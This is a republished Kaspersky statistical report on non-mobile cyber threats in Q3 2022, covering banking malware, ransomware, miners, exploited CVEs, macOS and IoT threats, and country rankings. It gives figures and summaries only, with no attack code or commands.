logo
DATABASE RESOURCES PRICING ABOUT US

IT threat evolution in Q3 2022. Non-mobile statistics

Description

![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/17134132/abstract_binary_brain_report-990x400.jpg) * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>) * **IT threat evolution in Q3 2022. Non-mobile statistics** * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>) _These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._ ## Quarterly figures According to Kaspersky Security Network, in Q3 2022: * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. * Web Anti-Virus recognized 251,288,987 unique URLs as malicious. * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users. * Ransomware attacks were defeated on the computers of 72,941 unique users. * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects. ## Financial threats ### Number of users attacked by banking malware In Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users. _Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_ ### TOP 10 banking malware families | **Name** | **Verdicts** | **%*** ---|---|---|--- 1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 7 | RTM | Trojan-Banker.Win32.RTM | 1.9 8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 _* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._ ### Geography of financial malware attacks **TOP 10 countries and territories by share of attacked users** | **Country or territory*** | **%**** ---|---|--- 1 | Turkmenistan | 4.7 2 | Afghanistan | 4.6 3 | Paraguay | 2.8 4 | Tajikistan | 2.8 5 | Yemen | 2.3 6 | Sudan | 2.3 7 | China | 2.0 8 | Switzerland | 2.0 9 | Egypt | 1.9 10 | Venezuela | 1.8 _* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). ** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._ ## Ransomware programs ### Quarterly trends and highlights The third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leakage to one of their developers' personal initiative, not the group's getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022. Mass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data. The United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back. The creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage. ### Number of new modifications In Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans. _Number of new ransomware modifications, Q3 2021 — Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_ ### Number of users attacked by ransomware Trojans In Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks. _Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_ **TOP 10 most common families of ransomware Trojans** | **Name** | **Verdicts** | **%*** ---|---|---|--- 1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod 7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 _* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._ ### Geography of attacked users **TOP 10 countries and territories attacked by ransomware Trojans** | **Country or territory*** | **%**** ---|---|--- 1 | Bangladesh | 1.66 2 | Yemen | 1.30 3 | South Korea | 0.98 4 | Taiwan | 0.77 5 | Mozambique | 0.64 6 | China | 0.52 7 | Colombia | 0.43 8 | Nigeria | 0.40 9 | Pakistan | 0.39 10 | Venezuela | 0.32 _* Excluded are countries with relatively few Kaspersky users (under 50,000). ** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._ ### TOP 10 most common families of ransomware Trojans | **Name** | **Verdicts*** | **Percentage of attacked users**** ---|---|---|--- 1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 _* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. ** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._ ## Miners ### Number of new miner modifications In Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June's figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer. _Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_ ### Number of users attacked by miners In Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity. _Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_ ### Geography of miner attacks **TOP 10 countries and territories attacked by miners** | **Country or territory*** | **%**** ---|---|--- 1 | Ethiopia | 2.38 2 | Kazakhstan | 2.13 3 | Uzbekistan | 2.01 4 | Rwanda | 1.93 5 | Tajikistan | 1.83 6 | Venezuela | 1.78 7 | Kyrgyzstan | 1.73 8 | Mozambique | 1.57 9 | Tanzania | 1.56 10 | Ukraine | 1.54 _* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). ** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._ ## Vulnerable applications used by criminals during cyberattacks ### Quarterly highlights Q3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let's begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system. Most of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. The attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system — in kernel context — by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which allows in theory to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited. Two vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities with similar exploitation technique (they were closed earlier). Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to to extort money from the victim, etc. ### Vulnerability statistics In Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections — 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities: * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system; * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files; * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled; * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation. _Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_ These were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome: * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow; * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component; * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox; * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system. Since many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine. A series of vulnerabilities were identified in Microsoft Edge. Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results. The Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers. The remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents. ## Attacks on macOS The third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com. [CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft. The creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3. In Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework. In addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application. ### TOP 20 threats for macOS | **Verdict** | **%*** ---|---|--- 1 | AdWare.OSX.Amc.e | 14.77 2 | AdWare.OSX.Pirrit.ac | 10.45 3 | AdWare.OSX.Agent.ai | 9.40 4 | Monitor.OSX.HistGrabber.b | 7.15 5 | AdWare.OSX.Pirrit.j | 7.10 6 | AdWare.OSX.Bnodlero.at | 6.09 7 | AdWare.OSX.Bnodlero.ax | 5.95 8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 9 | AdWare.OSX.Pirrit.ae | 5.27 10 | Trojan-Downloader.OSX.Agent.h | 3.87 11 | AdWare.OSX.Bnodlero.bg | 3.46 12 | AdWare.OSX.Pirrit.o | 3.32 13 | AdWare.OSX.Agent.u | 3.13 14 | AdWare.OSX.Agent.gen | 2.90 15 | AdWare.OSX.Pirrit.aa | 2.85 16 | Backdoor.OSX.Twenbc.e | 2.85 17 | AdWare.OSX.Ketin.h | 2.82 18 | AdWare.OSX.Pirrit.gen | 2.69 19 | Trojan-Downloader.OSX.Lador.a | 2.52 20 | Downloader.OSX.InstallCore.ak | 2.28 _* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._ As usual, our TOP 20 ranking for biggest threats encountered by users of Kaspersky security solutions for macOS were dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," had taken the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families. ### Geography of threats for macOS **TOP 10 countries and territories by share of attacked users** | **Country or territory*** | **%**** ---|---|--- 1 | France | 1.71 2 | Canada | 1.70 3 | Russia | 1.57 4 | India | 1.53 5 | United States | 1.52 6 | Spain | 1.48 7 | Australia | 1.36 8 | Italy | 1.35 9 | Mexico | 1.27 10 | United Kingdom | 1.24 _* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). ** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._ France, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac. ## IoT attacks ### IoT threat statistics In Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol. Telnet | 75.92% ---|--- SSH | 24.08% _Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_ A majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well. Telnet | 97.53% ---|--- SSH | 2.47% _Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_ **TOP 10 threats delivered to IoT devices via Telnet** | **Verdict** | **%*** ---|---|--- 1 | Backdoor.Linux.Mirai.b | 28.67 2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 3 | Backdoor.Linux.Mirai.ba | 11.63 4 | Backdoor.Linux.Mirai.cw | 10.94 5 | Backdoor.Linux.Gafgyt.a | 3.69 6 | Backdoor.Linux.Mirai.ew | 3.49 7 | Trojan-Downloader.Shell.Agent.p | 2.56 8 | Backdoor.Linux.Gafgyt.bj | 1.63 9 | Backdoor.Linux.Mirai.et | 1.17 10 | Backdoor.Linux.Mirai.ek | 1.08 _* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._ Detailed IoT-threat statistics are published in the DDoS report for Q3 2022. ## Attacks via web resources _The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._ ### Countries and territories that serve as sources of web-based attacks: TOP 10 _The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._ _To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._ In Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components. _Distribution of web-attack sources country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_ ### Countries and territories where users faced the greatest risk of online infection To assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories. Note that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware. | **Country or territory*** | **%**** ---|---|--- 1 | Taiwan | 19.65 2 | Belarus | 17.01 3 | Serbia | 15.05 4 | Russia | 14.12 5 | Algeria | 14.01 6 | Turkey | 13.82 7 | Tunisia | 13.31 8 | Bangladesh | 13.30 9 | Moldova | 13.22 10 | Palestine | 12.61 11 | Yemen | 12.58 12 | Ukraine | 12.25 13 | Libya | 12.23 14 | Sri Lanka | 11.97 15 | Kyrgyzstan | 11.69 16 | Estonia | 11.65 17 | Hong Kong | 11.52 18 | Nepal | 11.52 19 | Syria | 11.39 20 | Lithuania | 11.33 _* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ _** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._ On average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack. ## Local threats _In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._ In Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects. ### Countries and territories where users faced the highest risk of local infection For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries. These rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware. | **Country or territory*** | **%**** ---|---|--- 1 | Turkmenistan | 46.48 2 | Yemen | 45.12 3 | Afghanistan | 44.18 4 | Cuba | 40.48 5 | Tajikistan | 39.17 6 | Bangladesh | 37.06 7 | Uzbekistan | 37.00 8 | Ethiopia | 36.96 9 | South Sudan | 36.89 10 | Myanmar | 36.64 11 | Syria | 34.82 12 | Benin | 34.56 13 | Burundi | 33.91 14 | Tanzania | 33.05 15 | Rwanda | 33.03 16 | Chad | 33.01 17 | Venezuela | 32.79 18 | Cameroon | 32.30 19 | Sudan | 31.93 20 | Malawi | 31.88 _* Excluded are countries with relatively few Kaspersky users (under 10,000)._ _** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._ On average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. Russia scored 16.60% in this ranking.


Related